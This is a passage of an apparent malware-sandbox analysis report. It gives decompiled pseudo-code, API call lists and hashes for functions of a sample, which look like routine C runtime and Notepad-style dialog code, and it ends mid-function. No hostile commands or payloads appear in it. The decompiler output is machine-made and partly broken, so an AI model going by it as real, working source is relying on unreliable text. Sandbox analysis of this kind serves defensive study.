                                                                                              0x0135d128
                                                                                              0x0135d132
                                                                                              0x0135d13a
                                                                                              0x0135d15d
                                                                                              0x0135d162
                                                                                              0x0135d164
                                                                                              0x0135d169
                                                                                              0x0135d16c
                                                                                              0x0135d16c
                                                                                              0x0135d128
                                                                                              0x0135d171
                                                                                              0x0135d176
                                                                                              0x0135d182
                                                                                              0x0135d18f
                                                                                              0x0135d193
                                                                                              0x0135d1a1
                                                                                              0x0135d1a8
                                                                                              0x0135d1ca
                                                                                              0x0135d1d1
                                                                                              0x0135d1d6
                                                                                              0x0135d195
                                                                                              0x0135d197
                                                                                              0x0135d197
                                                                                              0x0135d184
                                                                                              0x0135d184
                                                                                              0x0135d187
                                                                                              0x0135d18b
                                                                                              0x0135d18b
                                                                                              0x0135d178
                                                                                              0x0135d179
                                                                                              0x0135d179
                                                                                              0x0135d1df

                                                                                              APIs
                                                                                                • Part of subcall function 0135C1FB: Replicator::operator[].LIBCMT ref: 0135C238
                                                                                              • DName::operator+.LIBCMT ref: 0135D151
                                                                                              • DName::operator+.LIBCMT ref: 0135D15D
                                                                                              • DName::operator=.LIBVCRUNTIME ref: 0135D197
                                                                                              • DName::DName.LIBVCRUNTIME ref: 0135D1AF
                                                                                              • DName::operator+.LIBCMT ref: 0135D1BE
                                                                                              • DName::operator+.LIBCMT ref: 0135D1CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                                                              • String ID:
                                                                                              • API String ID: 955152517-0
                                                                                              • Opcode ID: 4f727b05d893e44723a9cfda6ccb50e8d0c7880c2af2f28c190a00bd0d967a47
                                                                                              • Instruction ID: f7421963ed9a9f8fd6c49d1c8e340697ab6bc5a15a9912c9bae2c3873b8a9da9
                                                                                              • Opcode Fuzzy Hash: 4f727b05d893e44723a9cfda6ccb50e8d0c7880c2af2f28c190a00bd0d967a47
                                                                                              • Instruction Fuzzy Hash: D531A1B5A002099FCBA8DF98C450EEAFBF9BF69B08F00445DE98B97354D7309644CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0135B17C Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0135B17C(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x139e228 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E0138240C(_t13,  *0x139e228);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E01382447(_t14,  *0x139e228, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E0138238B();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E01382447(_t18,  *0x139e228, 0);
								} else {
									_t8 = E01382447(_t18,  *0x139e228, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E0135B2EA(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                                                                                              0x0135b17c
                                                                                              0x0135b183
                                                                                              0x0135b196
                                                                                              0x0135b19d
                                                                                              0x0135b19f
                                                                                              0x0135b1a3
                                                                                              0x0135b1bc
                                                                                              0x0135b1bc
                                                                                              0x0135b1a5
                                                                                              0x0135b1a7
                                                                                              0x0135b1ba
                                                                                              0x0135b1c1
                                                                                              0x0135b1ca
                                                                                              0x0135b1cd
                                                                                              0x0135b1d0
                                                                                              0x0135b1e4
                                                                                              0x0135b1e4
                                                                                              0x0135b1ed
                                                                                              0x0135b1d2
                                                                                              0x0135b1d9
                                                                                              0x0135b1df
                                                                                              0x0135b1e2
                                                                                              0x0135b1f6
                                                                                              0x0135b1f8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135b1e2
                                                                                              0x0135b1fb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135b1ba
                                                                                              0x0135b1a7
                                                                                              0x0135b203
                                                                                              0x0135b20d
                                                                                              0x0135b185
                                                                                              0x0135b187
                                                                                              0x0135b187

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,0135B173,013542AF,013539DE), ref: 0135B18A
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0135B198
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0135B1B1
                                                                                              • SetLastError.KERNEL32(00000000,0135B173,013542AF,013539DE), ref: 0135B203
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 1901094f1bff39f7fca6f5bb551ad8550432cb6d989a3be0d2a89626e9e4ea38
                                                                                              • Instruction ID: 708a43d23a30a24865430812bd7c641c297172bcd0febdc0525c4afbd9708033
                                                                                              • Opcode Fuzzy Hash: 1901094f1bff39f7fca6f5bb551ad8550432cb6d989a3be0d2a89626e9e4ea38
                                                                                              • Instruction Fuzzy Hash: 4801D8322093167EF7A936BD7C85D2B7A6DDB05B7CB20033AED20551E9EF1259428760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01352C30 Relevance: 9.1, APIs: 6, Instructions: 53windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 79%
                                                                                              			E01352C30(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t4;
				intOrPtr _t9;
				struct HWND__* _t15;
				void* _t16;

				_t16 = 0;
				_t4 = _a8;
				_t15 = _a4;
				if(_t4 == 0x110) {
					SetDlgItemInt(_t15, 0x194, SendMessageW( *0x139ebd8, 0xc9, 0xffffffff, 0) + 1, 0);
				} else {
					if(_t4 == 0x111) {
						_t9 = _a12;
						if(_t9 == 2) {
							_push(2);
							goto L7;
						} else {
							if(_t9 == 1) {
								SendMessageW( *0x139ebd8, 0xb1, SendMessageW( *0x139ebd8, 0xbb, GetDlgItemInt(_t15, 0x194, 0, 0) + 0xffffffff, 0), _t13);
								_push(1);
								L7:
								EndDialog(_t15, ??);
								_t16 = 1;
							}
						}
					}
				}
				return _t16;
			}







                                                                                              0x01352c32
                                                                                              0x01352c34
                                                                                              0x01352c38
                                                                                              0x01352c41
                                                                                              0x01352cb9
                                                                                              0x01352c43
                                                                                              0x01352c48
                                                                                              0x01352c4e
                                                                                              0x01352c55
                                                                                              0x01352cc1
                                                                                              0x00000000
                                                                                              0x01352c57
                                                                                              0x01352c5a
                                                                                              0x01352c92
                                                                                              0x01352c94
                                                                                              0x01352cc3
                                                                                              0x01352cc4
                                                                                              0x01352cca
                                                                                              0x01352cca
                                                                                              0x01352c5a
                                                                                              0x01352c55
                                                                                              0x01352c48
                                                                                              0x01352cd3

                                                                                              APIs
                                                                                              • GetDlgItemInt.USER32(?,00000194,00000000,00000000), ref: 01352C66
                                                                                              • SendMessageW.USER32(000000BB,-000000FF,00000000), ref: 01352C83
                                                                                              • SendMessageW.USER32(000000B1,00000000,00000000), ref: 01352C92
                                                                                              • SendMessageW.USER32(000000C9,000000FF,00000000), ref: 01352CA7
                                                                                              • SetDlgItemInt.USER32 ref: 01352CB9
                                                                                              • EndDialog.USER32(?,00000002), ref: 01352CC4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$Dialog
                                                                                              • String ID:
                                                                                              • API String ID: 781181374-0
                                                                                              • Opcode ID: 95bf89d96f7519955f84c42a8d1af1dc12d8cf153338945d43a2dba567d30e6d
                                                                                              • Instruction ID: 4c1ac983233cf4eaded715d4350c2e372681904db77e0f40c0a74ba831821a6c
                                                                                              • Opcode Fuzzy Hash: 95bf89d96f7519955f84c42a8d1af1dc12d8cf153338945d43a2dba567d30e6d
                                                                                              • Instruction Fuzzy Hash: B3014472644310FBFB315759DC4AF7B3A2DE741F25F100621FA11FA2D9C3A698819761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013516D0 Relevance: 9.0, APIs: 6, Instructions: 43windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E013516D0() {
				char _v522;
				struct _SYSTEMTIME* _t8;
				long _t9;
				struct _SYSTEMTIME* _t10;

				_t8 = _t10;
				GetLocalTime(_t8);
				_t9 =  &_v522;
				GetTimeFormatW(0x400, 2, _t8, 0, _t9, 0xff);
				SendMessageW( *0x139ebd8, 0xc2, 1, _t9);
				SendMessageW( *0x139ebd8, 0xc2, 1, " ");
				GetDateFormatW(0x400, 0, _t8, 0, _t9, 0xff);
				return SendMessageW( *0x139ebd8, 0xc2, 1, _t9);
			}







                                                                                              0x013516d9
                                                                                              0x013516dc
                                                                                              0x013516e2
                                                                                              0x013516f6
                                                                                              0x01351710
                                                                                              0x01351724
                                                                                              0x01351736
                                                                                              0x01351755

                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32 ref: 013516DC
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,000000FF), ref: 013516F6
                                                                                              • SendMessageW.USER32(000000C2,00000001,?), ref: 01351710
                                                                                              • SendMessageW.USER32(000000C2,00000001,0139403A), ref: 01351724
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,000000FF,?,00000000,?,000000FF), ref: 01351736
                                                                                              • SendMessageW.USER32(000000C2,00000001,?), ref: 0135174A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$FormatTime$DateLocal
                                                                                              • String ID:
                                                                                              • API String ID: 3786825601-0
                                                                                              • Opcode ID: cf4a79d37312ef14ed6228bf11ecc15b24d0b87a1771faa5fc4bd79e3e5210e2
                                                                                              • Instruction ID: 4c171e93453e77e819539b4ab50c965f286f813f7ff186e8255fa765440142c5
                                                                                              • Opcode Fuzzy Hash: cf4a79d37312ef14ed6228bf11ecc15b24d0b87a1771faa5fc4bd79e3e5210e2
                                                                                              • Instruction Fuzzy Hash: 6DF017723C13117BF6305692AC8FFA73E29EB85FA6F000020B3012A1C989E6189697A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013526D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ChooseFontW.COMDLG32 ref: 01352770
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 01352781
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 013527E2
                                                                                              • DeleteObject.GDI32(00000000), ref: 013527ED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Font$ChooseCreateDeleteIndirectMessageObjectSend
                                                                                              • String ID: A
                                                                                              • API String ID: 2123331125-3554254475
                                                                                              • Opcode ID: e25371f42f9b649e689ddb1b3022bdc129496e6ed2fa3ee65feec3fc3cdc6a38
                                                                                              • Instruction ID: 4e0b45e662cadde0de632af8fb4056a0ff00ce4153eed6b8c0167ed9822c6bab
                                                                                              • Opcode Fuzzy Hash: e25371f42f9b649e689ddb1b3022bdc129496e6ed2fa3ee65feec3fc3cdc6a38
                                                                                              • Instruction Fuzzy Hash: 4A313E21C1CBC196E221CF29D6406B6B7A8ABE9308F05F71AFDD820156EB7162D48F41
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013551FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 25%
                                                                                              			E013551FB(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0x139e210; // 0xbb40e64e
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0x13935ed, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0x13a2000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                                                                                              0x01355210
                                                                                              0x0135521b
                                                                                              0x01355221
                                                                                              0x01355225
                                                                                              0x01355230
                                                                                              0x01355238
                                                                                              0x01355242
                                                                                              0x01355248
                                                                                              0x0135524c
                                                                                              0x01355253
                                                                                              0x01355259
                                                                                              0x01355259
                                                                                              0x0135524c
                                                                                              0x0135525f
                                                                                              0x01355264
                                                                                              0x01355264
                                                                                              0x0135526d
                                                                                              0x01355277

                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,013935ED,000000FF,?,013552FF,?,?,013553AE,?), ref: 01355230
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01355242
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,013935ED,000000FF,?,013552FF,?,?,013553AE,?), ref: 01355264
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: f6185f9c639fea3d29f62230d40e914bf65844a9be1b6e630e6f5692eff28be1
                                                                                              • Instruction ID: 82c5fab5271b63774c656bcea64db915450bc148e63ee9050c341f301fb90311
                                                                                              • Opcode Fuzzy Hash: f6185f9c639fea3d29f62230d40e914bf65844a9be1b6e630e6f5692eff28be1
                                                                                              • Instruction Fuzzy Hash: 9A01A231954619EFDB218F54DC45FAEBBBCFB44B54F004629F812E2280DB799A00CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01362F11 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01362F11(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E01368845(_a4, L"api-ms-", 7) == 0 || E01368845(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}




                                                                                              0x01362f20
                                                                                              0x01362f28
                                                                                              0x01362f73
                                                                                              0x01362f2a
                                                                                              0x01362f33
                                                                                              0x00000000
                                                                                              0x01362f70
                                                                                              0x01362f6f
                                                                                              0x01362f6f

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 01362F20
                                                                                              • GetLastError.KERNEL32 ref: 01362F2A
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 01362F68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3177248105-537541572
                                                                                              • Opcode ID: f7dc01be61db7a753c897d6eb35807e2da592bbab35fc164dc858c5c74ed9b12
                                                                                              • Instruction ID: 350493f998bdabcf57858d7d3d762af4257e68746c9928596c63ccf4145f3529
                                                                                              • Opcode Fuzzy Hash: f7dc01be61db7a753c897d6eb35807e2da592bbab35fc164dc858c5c74ed9b12
                                                                                              • Instruction Fuzzy Hash: 79F01231784305B7EF211A65FC4AF6D3E5D9F00B58F158024F90CA80DDD7A3F5558655
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01360109 Relevance: 7.9, APIs: 5, Instructions: 362COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E01360109(void* __fp0, signed int* _a4, signed int* _a8) {
				signed char _v5;
				signed int _v12;
				char* _v16;
				signed int _v20;
				char* _v24;
				signed int _v28;
				char* _v32;
				char _v40;
				signed char _t144;
				signed int* _t146;
				signed int _t148;
				signed int _t149;
				signed int _t153;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int* _t202;
				void* _t205;
				signed int _t211;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				signed int _t219;
				signed int _t220;
				char** _t222;
				signed int _t232;
				signed char _t236;
				signed int _t238;
				signed int* _t241;
				void* _t244;
				void* _t256;

				_t265 = __fp0;
				_t219 =  *0x13a0b18;
				_t144 =  *_t219;
				if(_t144 == 0) {
					L0135BE7A(_t219, _a4, 1, _a8);
					L92:
					_t146 = _a4;
					L93:
					return _t146;
				}
				_t241 = _a8;
				_t220 = _t219 + 1;
				_t211 = _t144 & 0x000000ff;
				 *0x13a0b18 = _t220;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				_t244 = 2;
				_t256 = _t211 - 0x58;
				if(_t256 > 0) {
					__eflags = _t211 - 0x5f;
					if(_t211 == 0x5f) {
						_t236 =  *_t220;
						 *0x13a0b18 = _t220 + 1;
						_t148 = _t236 & 0x000000ff;
						_v5 = _t236;
						__eflags = _t148 - 0x4e;
						if(__eflags > 0) {
							_t149 = _t148 - 0x4f;
							__eflags = _t149 - 0xa;
							if(_t149 > 0xa) {
								L77:
								_v32 = "UNKNOWN";
								L78:
								_v28 = 7;
								L79:
								_t221 =  &_v16;
								E0135BD97( &_v16,  &_v32);
								L80:
								_t153 = (_v5 & 0x000000ff) - 0x45;
								__eflags = _t153;
								if(_t153 == 0) {
									L85:
									_t222 =  &_v40;
									L86:
									_v32 = "unsigned ";
									_v28 = 9;
									L87:
									_t221 = E0135B77F(_t222,  &_v32);
									E0135BB4B(_t155,  &_v32,  &_v16);
									_v16 = _v32;
									_v12 = _v28;
									L88:
									if( *_t241 != 0) {
										E0135BD24( &_v16, L0135BE4F(_t221,  &_v40, 0x20, _t241));
									}
									_t146 = _a4;
									 *_t146 = _v16;
									_t146[1] = _v12;
									goto L93;
								}
								_t162 = _t153 - _t244;
								__eflags = _t162;
								if(_t162 == 0) {
									goto L85;
								}
								_t163 = _t162 - _t244;
								__eflags = _t163;
								if(_t163 == 0) {
									goto L85;
								}
								_t164 = _t163 - _t244;
								__eflags = _t164;
								if(_t164 == 0) {
									goto L85;
								}
								__eflags = _t164 != _t244;
								if(_t164 != _t244) {
									goto L88;
								}
								goto L85;
							}
							switch( *((intOrPtr*)(_t149 * 4 +  &M01360645))) {
								case 0:
									_push(0xfffffffe);
									_pop(_t212);
									__eflags = 0;
									L56:
									_v16 = 0;
									_t166 = _t241;
									_v12 = 0;
									_t228 =  *_t166;
									_t167 = _t166[1];
									_v32 = _t228;
									_v28 = _t167;
									__eflags = _t212 - 0xfffffffe;
									if(_t212 != 0xfffffffe) {
										__eflags = _t228;
										if(_t228 == 0) {
											_t246 = _t212 & 0x00000002;
											__eflags = _t212 & 0x00000001;
											if((_t212 & 0x00000001) == 0) {
												__eflags = _t246;
												if(_t246 != 0) {
													_v24 = "volatile";
													_v20 = 8;
													E0135BD97( &_v16,  &_v24);
												}
											} else {
												_v24 = "const";
												_v20 = 5;
												E0135BD97( &_v16,  &_v24);
												__eflags = _t246;
												if(_t246 != 0) {
													_v24 = " volatile";
													_v20 = 9;
													E0135BC28( &_v16,  &_v24);
												}
											}
										}
										E01360803(_t212, 0, _t265, _a4,  &_v16,  &_v32, 1);
										goto L92;
									}
									_v28 = _t167 | 0x00000800;
									E01360803(_t212, 0, _t265,  &_v24,  &_v16,  &_v32, 0);
									_t238 = _v20;
									__eflags = 0x00000800 & _t238;
									if((0x00000800 & _t238) == 0) {
										_v32 = "[]";
										_v28 = 2;
										E0135BC28( &_v24,  &_v32);
										_t238 = _v20;
									}
									_t232 = _v24;
									goto L76;
								case 1:
									_v32 = "auto";
									L52:
									_v28 = 4;
									goto L79;
								case 2:
									_v32 = "char8_t";
									goto L78;
								case 3:
									_v32 = "<unknown>";
									_v28 = 9;
									goto L79;
								case 4:
									_v32 = "char16_t";
									goto L48;
								case 5:
									_v32 = "decltype(auto)";
									_v28 = 0xe;
									goto L79;
								case 6:
									_v32 = "char32_t";
									L48:
									_v28 = 8;
									goto L79;
								case 7:
									__eax =  &_v24;
									_v32 = "this ";
									_push(__edi);
									_push( &_v24);
									_v28 = 5;
									__eax = L0135F545(__ebx, __edi, __fp0);
									_pop(__ecx);
									_pop(__ecx);
									__esi = __eax;
									__ecx =  &_v40;
									__eax =  &_v32;
									__eax = E0135B77F( &_v40,  &_v32);
									__ecx =  &_v32;
									__ecx = __eax;
									E0135BB4B(__ecx,  &_v32, __esi) = _v32;
									_v16 = _v32;
									__eax = _v28;
									_push(2);
									_v12 = _v28;
									_pop(__esi);
									goto L80;
								case 8:
									_v32 = "wchar_t";
									goto L78;
								case 9:
									__eax =  &_v40;
									 *0x13a0b18 = __ecx;
									__eax = E01360671(__fp0,  &_v40);
									__ecx =  *__eax;
									__edx =  *((intOrPtr*)(__eax + 4));
									_v16 = __ecx;
									_v12 =  *((intOrPtr*)(__eax + 4));
									__eflags = __ecx;
									if(__ecx != 0) {
										goto L80;
									}
									L76:
									_t146 = _a4;
									 *_t146 = _t232;
									_t146[1] = _t238;
									goto L93;
							}
						}
						if(__eflags == 0) {
							_v32 = "bool";
							goto L52;
						}
						__eflags = _t148 - 0x48;
						if(__eflags > 0) {
							_t184 = _t148 - 0x49;
							__eflags = _t184;
							if(_t184 == 0) {
								L50:
								_v32 = "__int32";
								goto L78;
							}
							_t185 = _t184 - 1;
							__eflags = _t185;
							if(_t185 == 0) {
								L49:
								_v32 = "__int64";
								goto L78;
							}
							_t186 = _t185 - 1;
							__eflags = _t186;
							if(_t186 == 0) {
								goto L49;
							}
							_t187 = _t186 - 1;
							__eflags = _t187;
							if(_t187 == 0) {
								L47:
								_v32 = "__int128";
								goto L48;
							}
							__eflags = _t187 != 1;
							if(_t187 != 1) {
								goto L77;
							}
							goto L47;
						}
						if(__eflags == 0) {
							goto L50;
						}
						_t189 = _t148;
						__eflags = _t189;
						if(_t189 == 0) {
							 *0x13a0b18 = _t220;
							_t221 =  &_v16;
							E0135BDFB( &_v16, 1);
							goto L80;
						}
						_t191 = _t189 - 0x24;
						__eflags = _t191;
						if(_t191 == 0) {
							_v32 = "__w64 ";
							_v28 = 6;
							L0135BE2D(_t220, _a4,  &_v32, E01360109(__fp0,  &_v24, _t241));
							goto L92;
						}
						_t196 = _t191 - 0x20;
						__eflags = _t196;
						if(_t196 == 0) {
							L39:
							_v32 = "__int8";
							_v28 = 6;
							goto L79;
						}
						_t197 = _t196 - 1;
						__eflags = _t197;
						if(_t197 == 0) {
							goto L39;
						}
						_t198 = _t197 - 1;
						__eflags = _t198;
						if(_t198 == 0) {
							L38:
							_v32 = "__int16";
							goto L78;
						}
						__eflags = _t198 != 1;
						if(_t198 != 1) {
							goto L77;
						}
						goto L38;
					}
					L18:
					 *0x13a0b18 = _t220 - 1;
					_t202 = E01360671(_t265,  &_v32);
					_t232 =  *_t202;
					_t238 = _t202[1];
					_v16 = _t232;
					_v12 = _t238;
					__eflags = _t232;
					if(_t232 == 0) {
						goto L76;
					}
					L19:
					_t213 = _t211 - 0x43;
					if(_t213 == 0) {
						_v32 = "signed ";
						_t222 =  &_v24;
						_v28 = 7;
						goto L87;
					}
					_t214 = _t213 - _t244;
					if(_t214 == 0) {
						L26:
						_t222 =  &_v24;
						goto L86;
					}
					_t215 = _t214 - _t244;
					if(_t215 == 0) {
						goto L26;
					}
					_t216 = _t215 - _t244;
					if(_t216 == 0) {
						goto L26;
					}
					_t217 = _t216 - _t244;
					if(_t217 == 0) {
						goto L26;
					}
					if(_t217 == 0x14) {
						goto L80;
					} else {
						goto L88;
					}
				}
				if(_t256 == 0) {
					_v32 = "void";
					_v28 = 4;
					L12:
					_t221 =  &_v16;
					E0135BD97( &_v16,  &_v32);
					goto L88;
				}
				_t205 = _t211 - 0x43;
				if(_t205 > 0x10) {
					goto L18;
				}
				switch( *((intOrPtr*)(( *(_t205 + 0x1360631) & 0x000000ff) * 4 +  &M0136060D))) {
					case 0:
						_v32 = "char";
						goto L6;
					case 1:
						_v32 = "short";
